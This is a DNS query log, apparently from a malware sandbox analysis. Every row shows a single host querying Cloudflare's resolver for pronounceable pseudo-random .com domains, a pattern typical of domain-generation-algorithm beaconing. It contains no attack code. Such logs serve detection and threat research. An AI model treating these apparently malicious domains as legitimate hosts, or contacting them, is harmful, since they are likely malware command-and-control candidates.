Aug 23, 2024 18:47:00.576476097 CEST	192.168.2.4	1.1.1.1	0x1747	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.576623917 CEST	192.168.2.4	1.1.1.1	0x3e79	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.576761961 CEST	192.168.2.4	1.1.1.1	0x34fd	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.584600925 CEST	192.168.2.4	1.1.1.1	0x3b6b	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.584781885 CEST	192.168.2.4	1.1.1.1	0x436e	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.584914923 CEST	192.168.2.4	1.1.1.1	0x9cf7	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.585066080 CEST	192.168.2.4	1.1.1.1	0xb4d1	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.585199118 CEST	192.168.2.4	1.1.1.1	0x5dd7	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.585330009 CEST	192.168.2.4	1.1.1.1	0xedc7	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.589301109 CEST	192.168.2.4	1.1.1.1	0xe940	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.589488983 CEST	192.168.2.4	1.1.1.1	0xd26d	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.589852095 CEST	192.168.2.4	1.1.1.1	0x99c1	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.590068102 CEST	192.168.2.4	1.1.1.1	0xa1d9	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.590224981 CEST	192.168.2.4	1.1.1.1	0xe237	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.597352982 CEST	192.168.2.4	1.1.1.1	0x409a	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.597352982 CEST	192.168.2.4	1.1.1.1	0x3fa9	Standard query (0)	lymyxid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.597352982 CEST	192.168.2.4	1.1.1.1	0xd5df	Standard query (0)	qedyfyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.597352982 CEST	192.168.2.4	1.1.1.1	0x5f09	Standard query (0)	galyqaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.597352982 CEST	192.168.2.4	1.1.1.1	0x8d7c	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.597352982 CEST	192.168.2.4	1.1.1.1	0xd65b	Standard query (0)	vonyzuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.597352982 CEST	192.168.2.4	1.1.1.1	0xc854	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.597352982 CEST	192.168.2.4	1.1.1.1	0x935	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.597385883 CEST	192.168.2.4	1.1.1.1	0xf32b	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.597385883 CEST	192.168.2.4	1.1.1.1	0x7823	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.597385883 CEST	192.168.2.4	1.1.1.1	0x4333	Standard query (0)	volyqat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.597385883 CEST	192.168.2.4	1.1.1.1	0xdb7f	Standard query (0)	pumyxiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.597385883 CEST	192.168.2.4	1.1.1.1	0xbed0	Standard query (0)	qekyqop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.597771883 CEST	192.168.2.4	1.1.1.1	0xa32f	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.673631907 CEST	192.168.2.4	1.1.1.1	0x8fb6	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.702395916 CEST	192.168.2.4	1.1.1.1	0xfd58	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.743846893 CEST	192.168.2.4	1.1.1.1	0x4ead	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.791019917 CEST	192.168.2.4	1.1.1.1	0xaf97	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.791327000 CEST	192.168.2.4	1.1.1.1	0x4eab	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.884243011 CEST	192.168.2.4	1.1.1.1	0x9600	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.928443909 CEST	192.168.2.4	1.1.1.1	0xe2c	Standard query (0)	galyqaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.970068932 CEST	192.168.2.4	1.1.1.1	0xec36	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.974291086 CEST	192.168.2.4	1.1.1.1	0x7209	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:00.985197067 CEST	192.168.2.4	1.1.1.1	0x8a78	Standard query (0)	lysyfyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:01.035147905 CEST	192.168.2.4	1.1.1.1	0x633e	Standard query (0)	lymyxid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:01.090102911 CEST	192.168.2.4	1.1.1.1	0xbc1e	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:01.559772015 CEST	192.168.2.4	1.1.1.1	0x1fee	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:01.610568047 CEST	192.168.2.4	1.1.1.1	0x227c	Standard query (0)	www.gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:02.078334093 CEST	192.168.2.4	1.1.1.1	0x2d7c	Standard query (0)	ww3.galyqaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:03.146552086 CEST	192.168.2.4	1.1.1.1	0x1ca7	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.211019993 CEST	192.168.2.4	1.1.1.1	0xa326	Standard query (0)	pupydeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.211019993 CEST	192.168.2.4	1.1.1.1	0x9a0a	Standard query (0)	ganyzub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.212702990 CEST	192.168.2.4	1.1.1.1	0x9e7d	Standard query (0)	lykymox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.212796926 CEST	192.168.2.4	1.1.1.1	0x67a1	Standard query (0)	vopydek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.214354038 CEST	192.168.2.4	1.1.1.1	0xead2	Standard query (0)	qebylug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.214385986 CEST	192.168.2.4	1.1.1.1	0x7b3b	Standard query (0)	pujymip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.215609074 CEST	192.168.2.4	1.1.1.1	0xb36a	Standard query (0)	gatydaw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.216459990 CEST	192.168.2.4	1.1.1.1	0x8158	Standard query (0)	lyvylyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.217149973 CEST	192.168.2.4	1.1.1.1	0xd1d1	Standard query (0)	vojymic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.218575001 CEST	192.168.2.4	1.1.1.1	0x1df4	Standard query (0)	qetysal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.218575001 CEST	192.168.2.4	1.1.1.1	0xd2db	Standard query (0)	puvylyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.219878912 CEST	192.168.2.4	1.1.1.1	0x9ac0	Standard query (0)	gahynus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.220655918 CEST	192.168.2.4	1.1.1.1	0x19a8	Standard query (0)	lyrysor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.221476078 CEST	192.168.2.4	1.1.1.1	0xf257	Standard query (0)	vocykem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.222445011 CEST	192.168.2.4	1.1.1.1	0xe69b	Standard query (0)	qegynuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.223102093 CEST	192.168.2.4	1.1.1.1	0xc028	Standard query (0)	purypol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.224071026 CEST	192.168.2.4	1.1.1.1	0x7205	Standard query (0)	gacykeh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.224922895 CEST	192.168.2.4	1.1.1.1	0x473b	Standard query (0)	lygynud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.225919962 CEST	192.168.2.4	1.1.1.1	0xbd67	Standard query (0)	vowypit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.226670027 CEST	192.168.2.4	1.1.1.1	0xfe6e	Standard query (0)	qexykaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.227267027 CEST	192.168.2.4	1.1.1.1	0xfcab	Standard query (0)	pufybyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.228311062 CEST	192.168.2.4	1.1.1.1	0x4d22	Standard query (0)	gaqypiz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.228789091 CEST	192.168.2.4	1.1.1.1	0x6a59	Standard query (0)	lyxyjaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.230052948 CEST	192.168.2.4	1.1.1.1	0x5378	Standard query (0)	vofybyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.230232000 CEST	192.168.2.4	1.1.1.1	0x7f6b	Standard query (0)	qeqytup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.231522083 CEST	192.168.2.4	1.1.1.1	0xeeb1	Standard query (0)	puzyjoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.232445955 CEST	192.168.2.4	1.1.1.1	0xcdb2	Standard query (0)	gadyveb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.234213114 CEST	192.168.2.4	1.1.1.1	0x6637	Standard query (0)	lymytux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.245600939 CEST	192.168.2.4	1.1.1.1	0x97f0	Standard query (0)	volyjok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.264031887 CEST	192.168.2.4	1.1.1.1	0x682a	Standard query (0)	qedyveg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.268459082 CEST	192.168.2.4	1.1.1.1	0xcd54	Standard query (0)	galyhiw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.271925926 CEST	192.168.2.4	1.1.1.1	0x20e7	Standard query (0)	lysyvan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.295398951 CEST	192.168.2.4	1.1.1.1	0x6b34	Standard query (0)	qekyhil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.297291040 CEST	192.168.2.4	1.1.1.1	0x1ab4	Standard query (0)	vonyryc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.297569036 CEST	192.168.2.4	1.1.1.1	0x5d94	Standard query (0)	pupycag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.297732115 CEST	192.168.2.4	1.1.1.1	0x6ae3	Standard query (0)	lykygur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.297748089 CEST	192.168.2.4	1.1.1.1	0x12bd	Standard query (0)	ganyrys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.297895908 CEST	192.168.2.4	1.1.1.1	0xe86d	Standard query (0)	qebyrev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.298021078 CEST	192.168.2.4	1.1.1.1	0x2fec	Standard query (0)	pujygul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.298145056 CEST	192.168.2.4	1.1.1.1	0x88eb	Standard query (0)	vopycom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.298271894 CEST	192.168.2.4	1.1.1.1	0x113b	Standard query (0)	gatycoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.298397064 CEST	192.168.2.4	1.1.1.1	0x52b0	Standard query (0)	lyvywed.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.298526049 CEST	192.168.2.4	1.1.1.1	0x4b4f	Standard query (0)	vojygut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.299036026 CEST	192.168.2.4	1.1.1.1	0x2389	Standard query (0)	qetyxiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.299638033 CEST	192.168.2.4	1.1.1.1	0xe666	Standard query (0)	puvywav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.299901962 CEST	192.168.2.4	1.1.1.1	0x19aa	Standard query (0)	gahyfyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.300096989 CEST	192.168.2.4	1.1.1.1	0x5068	Standard query (0)	lyryxij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.300174952 CEST	192.168.2.4	1.1.1.1	0x1f62	Standard query (0)	vocyqaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.300460100 CEST	192.168.2.4	1.1.1.1	0xccca	Standard query (0)	qegyfyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.300642014 CEST	192.168.2.4	1.1.1.1	0x40ec	Standard query (0)	gacyqob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.300699949 CEST	192.168.2.4	1.1.1.1	0xece0	Standard query (0)	puryxuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.300853014 CEST	192.168.2.4	1.1.1.1	0x6e53	Standard query (0)	lygyfex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.301517010 CEST	192.168.2.4	1.1.1.1	0x7e10	Standard query (0)	vowyzuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.313364029 CEST	192.168.2.4	1.1.1.1	0xb435	Standard query (0)	qexyqog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.313474894 CEST	192.168.2.4	1.1.1.1	0x26ac	Standard query (0)	lyxymin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.313565969 CEST	192.168.2.4	1.1.1.1	0x746a	Standard query (0)	pufydep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.313602924 CEST	192.168.2.4	1.1.1.1	0xe4d9	Standard query (0)	gaqyzuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.313771009 CEST	192.168.2.4	1.1.1.1	0x81ef	Standard query (0)	vofydac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.313807964 CEST	192.168.2.4	1.1.1.1	0xab81	Standard query (0)	pumytup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.314841032 CEST	192.168.2.4	1.1.1.1	0x17b9	Standard query (0)	qeqylyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.315097094 CEST	192.168.2.4	1.1.1.1	0x782b	Standard query (0)	puzymig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.315403938 CEST	192.168.2.4	1.1.1.1	0xcaaa	Standard query (0)	lymylyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.316096067 CEST	192.168.2.4	1.1.1.1	0xe361	Standard query (0)	volymum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.317920923 CEST	192.168.2.4	1.1.1.1	0x3858	Standard query (0)	gadydas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.340816021 CEST	192.168.2.4	1.1.1.1	0x4beb	Standard query (0)	pupydeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.364289999 CEST	192.168.2.4	1.1.1.1	0xa1f9	Standard query (0)	lysyvan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.563935041 CEST	192.168.2.4	1.1.1.1	0x5ea0	Standard query (0)	pupycag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.843209982 CEST	192.168.2.4	1.1.1.1	0xefc2	Standard query (0)	lyrysor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:36.808643103 CEST	192.168.2.4	1.1.1.1	0x27cb	Standard query (0)	qedysov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:36.833857059 CEST	192.168.2.4	1.1.1.1	0xbd4	Standard query (0)	pumylel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:36.836477041 CEST	192.168.2.4	1.1.1.1	0xece0	Standard query (0)	galynuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.000771046 CEST	192.168.2.4	1.1.1.1	0x81b2	Standard query (0)	lysysod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.004936934 CEST	192.168.2.4	1.1.1.1	0x74d2	Standard query (0)	vonyket.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.012491941 CEST	192.168.2.4	1.1.1.1	0x5461	Standard query (0)	qekynuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.019927979 CEST	192.168.2.4	1.1.1.1	0x14c1	Standard query (0)	pupypiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.023184061 CEST	192.168.2.4	1.1.1.1	0x882c	Standard query (0)	ganykaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.026655912 CEST	192.168.2.4	1.1.1.1	0x734f	Standard query (0)	lykynyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.031167984 CEST	192.168.2.4	1.1.1.1	0xa936	Standard query (0)	vopypif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.038714886 CEST	192.168.2.4	1.1.1.1	0x9af1	Standard query (0)	qebykap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.045559883 CEST	192.168.2.4	1.1.1.1	0xb965	Standard query (0)	pujybyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.059571981 CEST	192.168.2.4	1.1.1.1	0x4e0	Standard query (0)	gatypub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.060077906 CEST	192.168.2.4	1.1.1.1	0xc6de	Standard query (0)	lyvyjox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.060336113 CEST	192.168.2.4	1.1.1.1	0xe74c	Standard query (0)	vojybek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.060741901 CEST	192.168.2.4	1.1.1.1	0x505	Standard query (0)	qetytug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.060915947 CEST	192.168.2.4	1.1.1.1	0x5597	Standard query (0)	puvyjop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.104377985 CEST	192.168.2.4	1.1.1.1	0xb9d	Standard query (0)	gahyvew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.108556032 CEST	192.168.2.4	1.1.1.1	0xe465	Standard query (0)	vocyjic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.108760118 CEST	192.168.2.4	1.1.1.1	0x4f2f	Standard query (0)	lyrytun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.108916044 CEST	192.168.2.4	1.1.1.1	0xf65b	Standard query (0)	purytyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.109421015 CEST	192.168.2.4	1.1.1.1	0xfe1a	Standard query (0)	qegyval.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.124967098 CEST	192.168.2.4	1.1.1.1	0x3f05	Standard query (0)	lygyvar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.125277996 CEST	192.168.2.4	1.1.1.1	0x562e	Standard query (0)	gacyhis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.187253952 CEST	192.168.2.4	1.1.1.1	0x3536	Standard query (0)	vowyrym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.187491894 CEST	192.168.2.4	1.1.1.1	0x4358	Standard query (0)	qexyhuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.187745094 CEST	192.168.2.4	1.1.1.1	0x7434	Standard query (0)	pufycol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.187889099 CEST	192.168.2.4	1.1.1.1	0xb593	Standard query (0)	gaqyreh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.188288927 CEST	192.168.2.4	1.1.1.1	0xb823	Standard query (0)	lyxygud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.188438892 CEST	192.168.2.4	1.1.1.1	0xea78	Standard query (0)	vofycot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.188750982 CEST	192.168.2.4	1.1.1.1	0xcecb	Standard query (0)	puzyguv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.189007044 CEST	192.168.2.4	1.1.1.1	0x8aa0	Standard query (0)	qeqyreq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.189224005 CEST	192.168.2.4	1.1.1.1	0x86c	Standard query (0)	gadyciz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.189615965 CEST	192.168.2.4	1.1.1.1	0xacb1	Standard query (0)	lymywaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.189893961 CEST	192.168.2.4	1.1.1.1	0xbf16	Standard query (0)	volygyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.191452026 CEST	192.168.2.4	1.1.1.1	0x2e0	Standard query (0)	qedyxip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.191848040 CEST	192.168.2.4	1.1.1.1	0x2ecb	Standard query (0)	pumywaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.192034960 CEST	192.168.2.4	1.1.1.1	0x7ee7	Standard query (0)	galyfyb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.192424059 CEST	192.168.2.4	1.1.1.1	0xd061	Standard query (0)	lysyxux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.192869902 CEST	192.168.2.4	1.1.1.1	0xc979	Standard query (0)	vonyqok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.193074942 CEST	192.168.2.4	1.1.1.1	0x8b5c	Standard query (0)	qekyfeg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.221111059 CEST	192.168.2.4	1.1.1.1	0x5486	Standard query (0)	pupyxup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.221991062 CEST	192.168.2.4	1.1.1.1	0xf1a4	Standard query (0)	lykyfen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.222311974 CEST	192.168.2.4	1.1.1.1	0x33	Standard query (0)	vopyzuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.222528934 CEST	192.168.2.4	1.1.1.1	0x1265	Standard query (0)	qebyqil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.223839998 CEST	192.168.2.4	1.1.1.1	0x5073	Standard query (0)	pujydag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.224143982 CEST	192.168.2.4	1.1.1.1	0xaf83	Standard query (0)	gatyzys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.224522114 CEST	192.168.2.4	1.1.1.1	0x17fe	Standard query (0)	vojydam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.224689007 CEST	192.168.2.4	1.1.1.1	0xf77e	Standard query (0)	qetylyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.224859953 CEST	192.168.2.4	1.1.1.1	0x2268	Standard query (0)	puvymul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.225245953 CEST	192.168.2.4	1.1.1.1	0x6bac	Standard query (0)	gahydoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.225471973 CEST	192.168.2.4	1.1.1.1	0x86c8	Standard query (0)	lyryled.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.225682020 CEST	192.168.2.4	1.1.1.1	0xdec0	Standard query (0)	vocymut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.276566029 CEST	192.168.2.4	1.1.1.1	0xfad	Standard query (0)	qegysoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.276770115 CEST	192.168.2.4	1.1.1.1	0x543c	Standard query (0)	gacynuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.276941061 CEST	192.168.2.4	1.1.1.1	0x8064	Standard query (0)	lygysij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.277412891 CEST	192.168.2.4	1.1.1.1	0xa27b	Standard query (0)	vowykaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.279663086 CEST	192.168.2.4	1.1.1.1	0x31cc	Standard query (0)	pufypiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.282016039 CEST	192.168.2.4	1.1.1.1	0x9343	Standard query (0)	gaqykab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.283670902 CEST	192.168.2.4	1.1.1.1	0x88b1	Standard query (0)	lyvymir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.283701897 CEST	192.168.2.4	1.1.1.1	0xc419	Standard query (0)	ganyqow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.283900023 CEST	192.168.2.4	1.1.1.1	0xe5b3	Standard query (0)	purylev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.283932924 CEST	192.168.2.4	1.1.1.1	0x6b2a	Standard query (0)	qexynyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.284089088 CEST	192.168.2.4	1.1.1.1	0xb3b4	Standard query (0)	lyxynyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.319160938 CEST	192.168.2.4	1.1.1.1	0x7fb0	Standard query (0)	galynuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.543504000 CEST	192.168.2.4	1.1.1.1	0x9b02	Standard query (0)	gadyciz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.679685116 CEST	192.168.2.4	1.1.1.1	0xf40e	Standard query (0)	lyxynyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.687506914 CEST	192.168.2.4	1.1.1.1	0xbff3	Standard query (0)	qegyval.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.700576067 CEST	192.168.2.4	1.1.1.1	0x4eee	Standard query (0)	vofycot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:38.191203117 CEST	192.168.2.4	1.1.1.1	0x4358	Standard query (0)	qexyhuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:38.396585941 CEST	192.168.2.4	1.1.1.1	0x669c	Standard query (0)	ww16.vofycot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:38.435899973 CEST	192.168.2.4	1.1.1.1	0xfef7	Standard query (0)	qexyhuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:38.718096972 CEST	192.168.2.4	1.1.1.1	0x38d1	Standard query (0)	ww25.lyxynyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.927797079 CEST	192.168.2.4	1.1.1.1	0x26cf	Standard query (0)	vofypuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.928783894 CEST	192.168.2.4	1.1.1.1	0x28d5	Standard query (0)	qeqykog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.929482937 CEST	192.168.2.4	1.1.1.1	0x38dc	Standard query (0)	puzybep.com	A (IP address)	IN (0x0001)	false
